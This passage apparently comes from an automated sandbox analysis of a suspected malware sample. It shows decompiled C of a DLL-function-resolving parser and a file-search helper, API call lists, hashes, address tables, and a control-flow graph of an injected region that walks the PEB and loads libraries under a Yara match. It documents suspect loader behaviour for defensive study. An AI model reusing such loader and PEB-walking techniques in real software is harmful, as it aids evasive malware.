                                                                                      											_v8 = _v8 | 0xffffffff;
                                                                                      											goto L57;
                                                                                      										case 3:
                                                                                      											_v8 = _v8 & 0x00000000;
                                                                                      											_v20 = _v20 & 0x00000000;
                                                                                      											_v16 = _v16 + 1;
                                                                                      											goto L85;
                                                                                      										case 4:
                                                                                      											__eflags = _v20;
                                                                                      											if(_v20 != 0) {
                                                                                      												goto L57;
                                                                                      											}
                                                                                      											_v12 = _v12 - 2;
                                                                                      											__ebx = E710312BB();
                                                                                      											 &_v12 = E71031B86( &_v12);
                                                                                      											__eax = E71031510(__edx, __eax, __edx, __ebx);
                                                                                      											goto L97;
                                                                                      										case 5:
                                                                                      											L105:
                                                                                      											_v20 = _v20 + 1;
                                                                                      											goto L57;
                                                                                      										case 6:
                                                                                      											_push(7);
                                                                                      											goto L123;
                                                                                      										case 7:
                                                                                      											_push(0x19);
                                                                                      											goto L143;
                                                                                      										case 8:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L107;
                                                                                      										case 9:
                                                                                      											_push(0x15);
                                                                                      											goto L143;
                                                                                      										case 0xa:
                                                                                      											_push(0x16);
                                                                                      											goto L143;
                                                                                      										case 0xb:
                                                                                      											_push(0x18);
                                                                                      											goto L143;
                                                                                      										case 0xc:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L118;
                                                                                      										case 0xd:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L109;
                                                                                      										case 0xe:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L111;
                                                                                      										case 0xf:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L122;
                                                                                      										case 0x10:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L113;
                                                                                      										case 0x11:
                                                                                      											_push(3);
                                                                                      											goto L123;
                                                                                      										case 0x12:
                                                                                      											_push(0x17);
                                                                                      											L143:
                                                                                      											_pop(__ebx);
                                                                                      											goto L98;
                                                                                      										case 0x13:
                                                                                      											__eax =  &_v12;
                                                                                      											__eax = E71031B86( &_v12);
                                                                                      											__ebx = __eax;
                                                                                      											__ebx = __eax + 1;
                                                                                      											__eflags = __ebx - 0xb;
                                                                                      											if(__ebx < 0xb) {
                                                                                      												__ebx = __ebx + 0xa;
                                                                                      											}
                                                                                      											goto L97;
                                                                                      										case 0x14:
                                                                                      											__ebx = 0xffffffff;
                                                                                      											goto L98;
                                                                                      										case 0x15:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L116;
                                                                                      										case 0x16:
                                                                                      											__ecx = 0;
                                                                                      											__eflags = 0;
                                                                                      											goto L91;
                                                                                      										case 0x17:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L120;
                                                                                      										case 0x18:
                                                                                      											_t271 =  *(_t332 + 0x1014);
                                                                                      											__eflags = _t271 - _v16;
                                                                                      											if(_t271 > _v16) {
                                                                                      												_v16 = _t271;
                                                                                      											}
                                                                                      											_v8 = _v8 & 0x00000000;
                                                                                      											_v20 = _v20 & 0x00000000;
                                                                                      											_v36 - 3 = _t271 - (_v36 == 3);
                                                                                      											if(_t271 != _v36 == 3) {
                                                                                      												L85:
                                                                                      												_v40 = 1;
                                                                                      											}
                                                                                      											goto L57;
                                                                                      										case 0x19:
                                                                                      											L107:
                                                                                      											__ecx = 0;
                                                                                      											_v8 = 2;
                                                                                      											__ecx = 1;
                                                                                      											goto L91;
                                                                                      										case 0x1a:
                                                                                      											L118:
                                                                                      											_push(5);
                                                                                      											goto L123;
                                                                                      										case 0x1b:
                                                                                      											L109:
                                                                                      											__ecx = 0;
                                                                                      											_v8 = 3;
                                                                                      											__ecx = 1;
                                                                                      											goto L91;
                                                                                      										case 0x1c:
                                                                                      											L111:
                                                                                      											__ecx = 0;
                                                                                      											__ecx = 1;
                                                                                      											goto L91;
                                                                                      										case 0x1d:
                                                                                      											L122:
                                                                                      											_push(6);
                                                                                      											goto L123;
                                                                                      										case 0x1e:
                                                                                      											L113:
                                                                                      											_push(2);
                                                                                      											goto L123;
                                                                                      										case 0x1f:
                                                                                      											__eax =  &_v12;
                                                                                      											__eax = E71031B86( &_v12);
                                                                                      											__ebx = __eax;
                                                                                      											__ebx = __eax + 1;
                                                                                      											goto L97;
                                                                                      										case 0x20:
                                                                                      											L116:
                                                                                      											_v52 = _v52 + 1;
                                                                                      											_push(4);
                                                                                      											_pop(__ecx);
                                                                                      											goto L91;
                                                                                      										case 0x21:
                                                                                      											L120:
                                                                                      											_push(4);
                                                                                      											L123:
                                                                                      											_pop(__ecx);
                                                                                      											L91:
                                                                                      											__edi = _v16;
                                                                                      											__edx =  *(0x7103405c + __ecx * 4);
                                                                                      											__eax =  ~__eax;
                                                                                      											asm("sbb eax, eax");
                                                                                      											_v40 = 1;
                                                                                      											__edi = _v16 << 5;
                                                                                      											__eax = __eax & 0x00008000;
                                                                                      											__edi = (_v16 << 5) + __esi;
                                                                                      											__eax = __eax | __ecx;
                                                                                      											__eflags = _v8;
                                                                                      											 *(__edi + 0x1018) = __eax;
                                                                                      											if(_v8 < 0) {
                                                                                      												L93:
                                                                                      												__edx = 0;
                                                                                      												__edx = 1;
                                                                                      												__eflags = 1;
                                                                                      												L94:
                                                                                      												__eflags = _v8 - 1;
                                                                                      												 *(__edi + 0x1028) = __edx;
                                                                                      												if(_v8 == 1) {
                                                                                      													__eax =  &_v12;
                                                                                      													__eax = E71031B86( &_v12);
                                                                                      													__eax = __eax + 1;
                                                                                      													__eflags = __eax;
                                                                                      													_v8 = __eax;
                                                                                      												}
                                                                                      												__eax = _v8;
                                                                                      												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                                      												_t136 = _v16 + 0x81; // 0x81
                                                                                      												_t136 = _t136 << 5;
                                                                                      												__eax = 0;
                                                                                      												__eflags = 0;
                                                                                      												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                      												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                                      												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                                      												L97:
                                                                                      												__eflags = __ebx;
                                                                                      												if(__ebx == 0) {
                                                                                      													goto L57;
                                                                                      												}
                                                                                      												L98:
                                                                                      												__eflags = _v20;
                                                                                      												_v40 = 1;
                                                                                      												if(_v20 != 0) {
                                                                                      													L103:
                                                                                      													__eflags = _v20 - 1;
                                                                                      													if(_v20 == 1) {
                                                                                      														__eax = _v16;
                                                                                      														__eax = _v16 << 5;
                                                                                      														__eflags = __eax;
                                                                                      														 *(__eax + __esi + 0x102c) = __ebx;
                                                                                      													}
                                                                                      													goto L105;
                                                                                      												}
                                                                                      												_v16 = _v16 << 5;
                                                                                      												_t144 = __esi + 0x1030; // 0x1030
                                                                                      												__edi = (_v16 << 5) + _t144;
                                                                                      												__eax =  *__edi;
                                                                                      												__eflags = __eax - 0xffffffff;
                                                                                      												if(__eax <= 0xffffffff) {
                                                                                      													L101:
                                                                                      													__eax = GlobalFree(__eax);
                                                                                      													L102:
                                                                                      													 *__edi = __ebx;
                                                                                      													goto L103;
                                                                                      												}
                                                                                      												__eflags = __eax - 0x19;
                                                                                      												if(__eax <= 0x19) {
                                                                                      													goto L102;
                                                                                      												}
                                                                                      												goto L101;
                                                                                      											}
                                                                                      											__eflags = __edx;
                                                                                      											if(__edx > 0) {
                                                                                      												goto L94;
                                                                                      											}
                                                                                      											goto L93;
                                                                                      										case 0x22:
                                                                                      											goto L57;
                                                                                      									}
                                                                                      								}
                                                                                      								_t272 = _t269 - 1;
                                                                                      								__eflags = _t272;
                                                                                      								if(_t272 == 0) {
                                                                                      									_v16 = _t283;
                                                                                      									goto L80;
                                                                                      								}
                                                                                      								__eflags = _t272 != 1;
                                                                                      								if(_t272 != 1) {
                                                                                      									goto L162;
                                                                                      								}
                                                                                      								__eflags = _t286 - 0x6e;
                                                                                      								if(__eflags > 0) {
                                                                                      									_t309 = _t286 - 0x72;
                                                                                      									__eflags = _t309;
                                                                                      									if(_t309 == 0) {
                                                                                      										_push(4);
                                                                                      										L74:
                                                                                      										_pop(_t274);
                                                                                      										L75:
                                                                                      										__eflags = _v8 - 1;
                                                                                      										if(_v8 != 1) {
                                                                                      											_t96 = _t332 + 0x1010;
                                                                                      											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                                                      											__eflags =  *_t96;
                                                                                      										} else {
                                                                                      											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                                                      										}
                                                                                      										_v8 = 1;
                                                                                      										goto L57;
                                                                                      									}
                                                                                      									_t312 = _t309 - 1;
                                                                                      									__eflags = _t312;
                                                                                      									if(_t312 == 0) {
                                                                                      										_push(0x10);
                                                                                      										goto L74;
                                                                                      									}
                                                                                      									__eflags = _t312 != 0;
                                                                                      									if(_t312 != 0) {
                                                                                      										goto L57;
                                                                                      									}
                                                                                      									_push(0x40);
                                                                                      									goto L74;
                                                                                      								}
                                                                                      								if(__eflags == 0) {
                                                                                      									_push(8);
                                                                                      									goto L74;
                                                                                      								}
                                                                                      								_t315 = _t286 - 0x21;
                                                                                      								__eflags = _t315;
                                                                                      								if(_t315 == 0) {
                                                                                      									_v8 =  ~_v8;
                                                                                      									goto L57;
                                                                                      								}
                                                                                      								_t316 = _t315 - 0x11;
                                                                                      								__eflags = _t316;
                                                                                      								if(_t316 == 0) {
                                                                                      									_t274 = 0x100;
                                                                                      									goto L75;
                                                                                      								}
                                                                                      								_t317 = _t316 - 0x31;
                                                                                      								__eflags = _t317;
                                                                                      								if(_t317 == 0) {
                                                                                      									_t274 = 1;
                                                                                      									goto L75;
                                                                                      								}
                                                                                      								__eflags = _t317 != 0;
                                                                                      								if(_t317 != 0) {
                                                                                      									goto L57;
                                                                                      								}
                                                                                      								_push(0x20);
                                                                                      								goto L74;
                                                                                      							} else {
                                                                                      								_v32 = _t283;
                                                                                      								_v36 = _t283;
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						}
                                                                                      						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                                                      						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                                                      							goto L17;
                                                                                      						}
                                                                                      						__eflags = _v32 - _t283;
                                                                                      						if(_v32 == _t283) {
                                                                                      							goto L43;
                                                                                      						}
                                                                                      						goto L17;
                                                                                      					}
                                                                                      					_t277 = _t258 - 5;
                                                                                      					if(_t277 == 0) {
                                                                                      						__eflags = _v44 - _t283;
                                                                                      						if(_v44 != _t283) {
                                                                                      							goto L43;
                                                                                      						} else {
                                                                                      							__eflags = _v36 - 3;
                                                                                      							_v32 = 1;
                                                                                      							_v8 = _t283;
                                                                                      							_v20 = _t283;
                                                                                      							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                      							_v40 = _t283;
                                                                                      							goto L20;
                                                                                      						}
                                                                                      					}
                                                                                      					_t281 = _t277 - 1;
                                                                                      					if(_t281 == 0) {
                                                                                      						__eflags = _v44 - _t283;
                                                                                      						if(_v44 != _t283) {
                                                                                      							goto L43;
                                                                                      						} else {
                                                                                      							_v32 = 2;
                                                                                      							_v8 = _t283;
                                                                                      							_v20 = _t283;
                                                                                      							goto L20;
                                                                                      						}
                                                                                      					}
                                                                                      					if(_t281 != 0x16) {
                                                                                      						goto L43;
                                                                                      					} else {
                                                                                      						_v32 = 3;
                                                                                      						_v8 = 1;
                                                                                      						goto L20;
                                                                                      					}
                                                                                      				}
                                                                                      				GlobalFree(_v56);
                                                                                      				GlobalFree(_v24);
                                                                                      				GlobalFree(_v48);
                                                                                      				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                                                      					L182:
                                                                                      					return _t332;
                                                                                      				} else {
                                                                                      					_t225 =  *_t332 - 1;
                                                                                      					if(_t225 == 0) {
                                                                                      						_t187 = _t332 + 8; // 0x8
                                                                                      						_t324 = _t187;
                                                                                      						__eflags =  *_t324 - _t283;
                                                                                      						if( *_t324 != _t283) {
                                                                                      							_t226 = GetModuleHandleW(_t324);
                                                                                      							__eflags = _t226 - _t283;
                                                                                      							 *(_t332 + 0x1008) = _t226;
                                                                                      							if(_t226 != _t283) {
                                                                                      								L171:
                                                                                      								_t192 = _t332 + 0x808; // 0x808
                                                                                      								_t325 = _t192;
                                                                                      								_t227 = E710316BD( *(_t332 + 0x1008), _t325);
                                                                                      								__eflags = _t227 - _t283;
                                                                                      								 *(_t332 + 0x100c) = _t227;
                                                                                      								if(_t227 == _t283) {
                                                                                      									__eflags =  *_t325 - 0x23;
                                                                                      									if( *_t325 == 0x23) {
                                                                                      										_t195 = _t332 + 0x80a; // 0x80a
                                                                                      										_t231 = E710313B1(_t195);
                                                                                      										__eflags = _t231 - _t283;
                                                                                      										if(_t231 != _t283) {
                                                                                      											__eflags = _t231 & 0xffff0000;
                                                                                      											if((_t231 & 0xffff0000) == 0) {
                                                                                      												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								__eflags = _v52 - _t283;
                                                                                      								if(_v52 != _t283) {
                                                                                      									L178:
                                                                                      									_t325[lstrlenW(_t325)] = 0x57;
                                                                                      									_t229 = E710316BD( *(_t332 + 0x1008), _t325);
                                                                                      									__eflags = _t229 - _t283;
                                                                                      									if(_t229 != _t283) {
                                                                                      										L166:
                                                                                      										 *(_t332 + 0x100c) = _t229;
                                                                                      										goto L182;
                                                                                      									}
                                                                                      									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                      									L180:
                                                                                      									if(__eflags != 0) {
                                                                                      										goto L182;
                                                                                      									}
                                                                                      									L181:
                                                                                      									_t206 = _t332 + 4;
                                                                                      									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                                                      									__eflags =  *_t206;
                                                                                      									goto L182;
                                                                                      								} else {
                                                                                      									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                      									if( *(_t332 + 0x100c) != _t283) {
                                                                                      										goto L182;
                                                                                      									}
                                                                                      									goto L178;
                                                                                      								}
                                                                                      							}
                                                                                      							_t234 = LoadLibraryW(_t324); // executed
                                                                                      							__eflags = _t234 - _t283;
                                                                                      							 *(_t332 + 0x1008) = _t234;
                                                                                      							if(_t234 == _t283) {
                                                                                      								goto L181;
                                                                                      							}
                                                                                      							goto L171;
                                                                                      						}
                                                                                      						_t188 = _t332 + 0x808; // 0x808
                                                                                      						_t236 = E710313B1(_t188);
                                                                                      						 *(_t332 + 0x100c) = _t236;
                                                                                      						__eflags = _t236 - _t283;
                                                                                      						goto L180;
                                                                                      					}
                                                                                      					_t237 = _t225 - 1;
                                                                                      					if(_t237 == 0) {
                                                                                      						_t185 = _t332 + 0x808; // 0x808
                                                                                      						_t238 = _t185;
                                                                                      						__eflags =  *_t238 - _t283;
                                                                                      						if( *_t238 == _t283) {
                                                                                      							goto L182;
                                                                                      						}
                                                                                      						_t229 = E710313B1(_t238);
                                                                                      						L165:
                                                                                      						goto L166;
                                                                                      					}
                                                                                      					if(_t237 != 1) {
                                                                                      						goto L182;
                                                                                      					}
                                                                                      					_t81 = _t332 + 8; // 0x8
                                                                                      					_t284 = _t81;
                                                                                      					_t326 = E710313B1(_t81);
                                                                                      					 *(_t332 + 0x1008) = _t326;
                                                                                      					if(_t326 == 0) {
                                                                                      						goto L181;
                                                                                      					}
                                                                                      					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                                                      					 *((intOrPtr*)(_t332 + 0x1050)) = E710312CC(_t284);
                                                                                      					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                                                      					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                                                      					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                                                      					_t90 = _t332 + 0x808; // 0x808
                                                                                      					_t229 =  *(_t326->i + E710313B1(_t90) * 4);
                                                                                      					goto L165;
                                                                                      				}
                                                                                      			}
                                                                                      0x71031e51
                                                                                      0x71031e54
                                                                                      0x71031e57
                                                                                      0x71031e5a
                                                                                      0x71031e5a
                                                                                      0x00000000
                                                                                      0x71031e5a
                                                                                      0x710321d0
                                                                                      0x710321d3
                                                                                      0x710321da
                                                                                      0x710321da
                                                                                      0x710321dd
                                                                                      0x710321e1
                                                                                      0x710321f5
                                                                                      0x710321f5
                                                                                      0x710321f8
                                                                                      0x710321fc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710321fe
                                                                                      0x71032202
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032204
                                                                                      0x7103220b
                                                                                      0x7103220b
                                                                                      0x71032211
                                                                                      0x71032214
                                                                                      0x71032230
                                                                                      0x71032216
                                                                                      0x7103221f
                                                                                      0x71032222
                                                                                      0x71032222
                                                                                      0x00000000
                                                                                      0x71032214
                                                                                      0x710321e3
                                                                                      0x710321e6
                                                                                      0x710321ea
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710321ec
                                                                                      0x00000000
                                                                                      0x710321ec
                                                                                      0x710321d5
                                                                                      0x710321d8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710321d8
                                                                                      0x71031dfe
                                                                                      0x71031dfe
                                                                                      0x71031dff
                                                                                      0x71031f49
                                                                                      0x71031f49
                                                                                      0x71031f50
                                                                                      0x71031f53
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031f60
                                                                                      0x00000000
                                                                                      0x7103214b
                                                                                      0x7103214e
                                                                                      0x71032151
                                                                                      0x71032151
                                                                                      0x71032152
                                                                                      0x71032153
                                                                                      0x71032156
                                                                                      0x71032159
                                                                                      0x7103215c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103215e
                                                                                      0x7103215e
                                                                                      0x71032162
                                                                                      0x7103217a
                                                                                      0x7103217d
                                                                                      0x71032181
                                                                                      0x71032187
                                                                                      0x00000000
                                                                                      0x71032187
                                                                                      0x71032164
                                                                                      0x71032164
                                                                                      0x71032167
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032169
                                                                                      0x7103216c
                                                                                      0x7103216e
                                                                                      0x7103216f
                                                                                      0x7103216f
                                                                                      0x7103216f
                                                                                      0x71032170
                                                                                      0x71032173
                                                                                      0x71032176
                                                                                      0x71032177
                                                                                      0x71032151
                                                                                      0x71032152
                                                                                      0x71032153
                                                                                      0x71032156
                                                                                      0x71032159
                                                                                      0x7103215c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103215c
                                                                                      0x00000000
                                                                                      0x71031fa7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031fb3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031f9a
                                                                                      0x71031f9e
                                                                                      0x71031fa2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103211c
                                                                                      0x71032120
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032126
                                                                                      0x7103212f
                                                                                      0x71032136
                                                                                      0x7103213e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032083
                                                                                      0x71032083
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031fbc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710321a6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103208b
                                                                                      0x7103208d
                                                                                      0x7103208d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032196
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103219a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710321a2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320d3
                                                                                      0x710320d5
                                                                                      0x710320d5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103209d
                                                                                      0x7103209f
                                                                                      0x7103209f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320af
                                                                                      0x710320b1
                                                                                      0x710320b1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320e1
                                                                                      0x710320e3
                                                                                      0x710320e3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320ba
                                                                                      0x710320bc
                                                                                      0x710320bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320c1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103219e
                                                                                      0x710321a8
                                                                                      0x710321a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320ec
                                                                                      0x710320f0
                                                                                      0x710320f5
                                                                                      0x710320f8
                                                                                      0x710320f9
                                                                                      0x710320fc
                                                                                      0x71032102
                                                                                      0x71032102
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103218e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320c5
                                                                                      0x710320c7
                                                                                      0x710320c7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031fc3
                                                                                      0x71031fc3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320da
                                                                                      0x710320dc
                                                                                      0x710320dc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031f67
                                                                                      0x71031f6d
                                                                                      0x71031f70
                                                                                      0x71031f72
                                                                                      0x71031f72
                                                                                      0x71031f75
                                                                                      0x71031f79
                                                                                      0x71031f86
                                                                                      0x71031f88
                                                                                      0x71031f8e
                                                                                      0x71031f8e
                                                                                      0x71031f8e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103208e
                                                                                      0x7103208e
                                                                                      0x71032090
                                                                                      0x71032097
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320d6
                                                                                      0x710320d6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320a0
                                                                                      0x710320a0
                                                                                      0x710320a2
                                                                                      0x710320a9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320b2
                                                                                      0x710320b2
                                                                                      0x710320b4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320e4
                                                                                      0x710320e4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320bd
                                                                                      0x710320bd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103210a
                                                                                      0x7103210e
                                                                                      0x71032113
                                                                                      0x71032116
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320c8
                                                                                      0x710320c8
                                                                                      0x710320cb
                                                                                      0x710320cd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320dd
                                                                                      0x710320dd
                                                                                      0x710320e6
                                                                                      0x710320e6
                                                                                      0x71031fc5
                                                                                      0x71031fc5
                                                                                      0x71031fc8
                                                                                      0x71031fcf
                                                                                      0x71031fd1
                                                                                      0x71031fd3
                                                                                      0x71031fda
                                                                                      0x71031fdd
                                                                                      0x71031fe2
                                                                                      0x71031fe4
                                                                                      0x71031fe6
                                                                                      0x71031fea
                                                                                      0x71031ff0
                                                                                      0x71031ff6
                                                                                      0x71031ff6
                                                                                      0x71031ff8
                                                                                      0x71031ff8
                                                                                      0x71031ff9

                                                                                      APIs
                                                                                        • Part of subcall function 710312BB: GlobalAlloc.KERNEL32(00000040,?,710312DB,?,7103137F,00000019,710311CA,-000000A0), ref: 710312C5
                                                                                      • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 71031D2D
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 71031D75
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 71031D7F
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71031D92
                                                                                      • GlobalFree.KERNEL32(?), ref: 71031E74
                                                                                      • GlobalFree.KERNEL32(?), ref: 71031E79
                                                                                      • GlobalFree.KERNEL32(?), ref: 71031E7E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71032068
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 71032222
                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 710322A1
                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 710322B2
                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 7103230C
                                                                                      • lstrlenW.KERNEL32(00000808), ref: 71032326
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 245916457-0
                                                                                      • Opcode ID: 599d9ed020341530ed5b3d32b1188a6982aff43287a990e006b6d58deeed7a48
                                                                                      • Instruction ID: 065f7a94ea7cef69f02624621f24b92bb9ff7e5ab1fbd14c50e57bdda955b902
                                                                                      • Opcode Fuzzy Hash: 599d9ed020341530ed5b3d32b1188a6982aff43287a990e006b6d58deeed7a48
                                                                                      • Instruction Fuzzy Hash: 2C22EE75D0420ADEDB12DFB4C9842EDBBF2FF89B05F90856EE1A6E2280D7709585CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 884 2f493d1-2f4943e GetPEB 886 2f49440-2f49469 884->886 887 2f499ef 886->887 888 2f4946f-2f494ef 886->888 890 2f494f5-2f494fc 888->890 890->890 891 2f494fe-2f49501 890->891 892 2f49506-2f49533 891->892 892->886 893 2f49539-2f495ae 892->893 893->892 895 2f495b4-2f495ed 893->895 896 2f495f0-2f495fc 895->896 896->896 897 2f495fe-2f49668 896->897 899 2f4966b-2f49677 897->899 899->899 900 2f49679-2f496b7 899->900 900->892 901 2f496bd-2f49757 call 2f57f48 900->901 905 2f4975d-2f497c1 901->905 906 2f547be-2f54863 901->906 911 2f497c4-2f497cb 905->911 909 2f54865-2f54885 call 2f54ee4 call 2f548ee 906->909 910 2f54888-2f54896 LoadLibraryA call 2f548ee 906->910 909->910 911->911 914 2f497cd-2f497ef 911->914 917 2f497f5-2f499e4 914->917 918 2f57f48-2f57f4f 914->918 917->892 920 2f57f50-2f57fba 918->920 925 2f57fbc-2f57fbe 920->925
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -Q*$>$[o
                                                                                      • API String ID: 0-1076388450
                                                                                      • Opcode ID: fc1512524ab8aeb9e7159342468f1a1cb6e644bd5d3f5a597a9b085d21ef7915
                                                                                      • Instruction ID: a5ec4b5e604626094d095e97276e62d68a31ae94e6964df0d1119fbacebecc76
                                                                                      • Opcode Fuzzy Hash: fc1512524ab8aeb9e7159342468f1a1cb6e644bd5d3f5a597a9b085d21ef7915
                                                                                      • Instruction Fuzzy Hash: FAC127717043998FDF34CE29CDA43DB37A6EF96390F54822ACD4A9B249D7B08942CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00406873(WCHAR* _a4) {
                                                                                      				void* _t2;
                                                                                      
                                                                                      				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                                                      				if(_t2 == 0xffffffff) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				FindClose(_t2);
                                                                                      				return 0x4302b8;
                                                                                      			}





                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(75A43420,004302B8,C:\,00405F5D,C:\,C:\,00000000,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                      • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: C:\
                                                                                      • API String ID: 2295610775-3404278061
                                                                                      • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                      • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                      • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                      • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
